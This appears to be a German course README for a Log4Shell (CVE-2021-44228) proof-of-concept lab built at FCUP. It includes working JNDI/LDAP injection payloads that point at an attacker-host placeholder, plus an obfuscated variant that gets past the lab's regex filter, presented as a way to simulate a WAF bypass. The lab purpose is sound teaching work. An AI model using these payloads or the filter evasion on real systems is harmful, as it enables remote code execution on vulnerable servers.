
Proof of Concept für die Log4Shell-Sicherheitslücke (CVE-2021-44228), entwickelt im Rahmen der Kursarbeit für die Lehrveranstaltung TPAS im Masterstudiengang Informationssicherheit an der FCUP.
Dieses Repository enthält einen Proof of Concept (PoC) für die Log4Shell-Schwachstelle (CVE-2021-44228), der im Rahmen der Lehrveranstaltung TPAS des Masterstudiengangs Informationssicherheit an der FCUP entwickelt wurde.
Es umfasst:
Um diesen Stack auszuführen, müssen Sie:
Sobald alles läuft:
Platzieren Sie dieses Payload in der Suchleiste (URL-kodiert, da es in einem GET-Query-Parameter steht):
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
Oder platzieren Sie dieses Payload in den Headern einer Anfrage (Sie können Burp Suite verwenden, um eine Anfrage abzufangen und zu manipulieren):
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
Auf der Website gibt es ein Symbol neben dem Benutzernamen, mit dem Sie zwischen der Bereinigung der protokollierten Zeichenfolge mit dem regulären Ausdruck \$\{jndi:.*?} oder nicht umschalten können. Standardmäßig ist die Bereinigung deaktiviert, dargestellt durch ein rotes Dämon-Symbol. Wenn die Bereinigung aktiviert ist, ändert sich das Symbol in ein grünes Smiley-Gesicht.
Diese Funktion kann verwendet werden, um einen WAF-Bypass zu simulieren. Sie können weitere reguläre Ausdrücke in der LoggerManager.java-Klasse des Backends hinzufügen.
Hier ist ein Payload, der nicht vom aktuellen regulären Ausdruck erfasst wird:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}